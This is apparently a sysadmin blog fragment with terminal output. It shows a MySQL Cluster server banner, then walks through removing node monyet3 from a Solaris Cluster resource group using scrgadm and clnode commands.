Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
all that's left is configuring privileges & creating a database with the ndbcluster engine



Removing a Node From a Resource Group
how to remove a node (monyet3) from an active resource group..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrg status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2

from the active node:

# clnode evacuate monyet3

shut down monyet3 and boot it in non-cluster mode:

ok boot -x

to be continued….


